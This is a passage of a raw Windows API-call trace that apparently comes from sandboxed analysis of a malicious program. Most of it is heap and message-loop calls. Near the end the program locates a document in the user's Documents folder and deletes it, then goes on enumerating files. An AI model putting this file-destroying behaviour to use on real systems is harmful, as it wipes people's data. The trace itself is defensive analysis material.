lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0267.541] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0267.541] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0267.541] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0267.541] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0267.541] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0267.541] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.542] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.542] FreeLibrary (hLibModule=0x756e0000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.542] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0267.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.543] CloseHandle (hObject=0x2a0) returned 1 [0267.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0267.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0267.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0267.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0267.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.546] CloseHandle (hObject=0x2d0) returned 1 [0267.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0267.550] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f43578 | out: hHeap=0x970000) returned 1 [0267.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0267.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0267.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0267.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.556] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.557] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e558d8 [0267.557] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/S7DDzGLO.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\S7DDzGLO.docx", lpFilePart=0x8cedf4*="S7DDzGLO.docx") returned 0x27 [0267.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\S7DDzGLO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s7ddzglo.docx")) returned 0x20 [0267.558] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\S7DDzGLO.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe825e1e0, ftCreationTime.dwHighDateTime=0x1d5ab39, ftLastAccessTime.dwLowDateTime=0xb00c280, ftLastAccessTime.dwHighDateTime=0x1d566c4, ftLastWriteTime.dwLowDateTime=0xb00c280, ftLastWriteTime.dwHighDateTime=0x1d566c4, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x0, dwReserved1=0x0, cFileName="S7DDzGLO.docx", cAlternateFileName="S7DDZG~1.DOC")) returned 0xa874d0 [0267.558] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\S7DDzGLO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s7ddzglo.docx")) returned 1 [0267.564] FindNextFileW (in: hFindFile=0xa874d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe825e1e0, ftCreationTime.dwHighDateTime=0x1d5ab39, ftLastAccessTime.dwLowDateTime=0xb00c280, ftLastAccessTime.dwHighDateTime=0x1d566c4, 